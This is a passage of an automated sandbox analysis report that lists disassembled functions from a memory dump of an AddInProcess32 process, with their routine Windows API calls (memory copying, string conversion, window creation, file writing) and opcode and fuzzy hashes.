                                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                  Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                  • free.MSVCRT ref: 0041747F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605342592-0
                                                                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                  Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2678498856-0
                                                                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                  Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2754987064-0
                                                                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                  Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2754987064-0
                                                                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                  Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 764393265-0
                                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                  Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                  • String ID:
                                                                                                  • API String ID: 979780441-0
                                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                  Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                  • String ID:
                                                                                                  • API String ID: 1386444988-0
                                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                  Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                  • String ID: "
                                                                                                  • API String ID: 1983396471-123907689
                                                                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                  Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                  • String ID: %2.2X
                                                                                                  • API String ID: 2789212964-323797159
                                                                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                  Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf
                                                                                                  • String ID: %%-%d.%ds
                                                                                                  • API String ID: 3988819677-2008345750
                                                                                                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                  Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSendmemset
                                                                                                  • String ID: F^@
                                                                                                  • API String ID: 568519121-3652327722
                                                                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                  Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PlacementWindowmemset
                                                                                                  • String ID: WinPos
                                                                                                  • API String ID: 4036792311-2823255486
                                                                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                  Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                  • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                  • memset.MSVCRT ref: 0042BAAE
                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 438689982-0
                                                                                                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                  Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1860491036-0
                                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                  Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                  • free.MSVCRT ref: 0040A908
                                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 726966127-0
                                                                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                  Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 726966127-0
                                                                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                  Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3669619086-0
                                                                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                  Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                  • free.MSVCRT ref: 00417425
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605342592-0
                                                                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5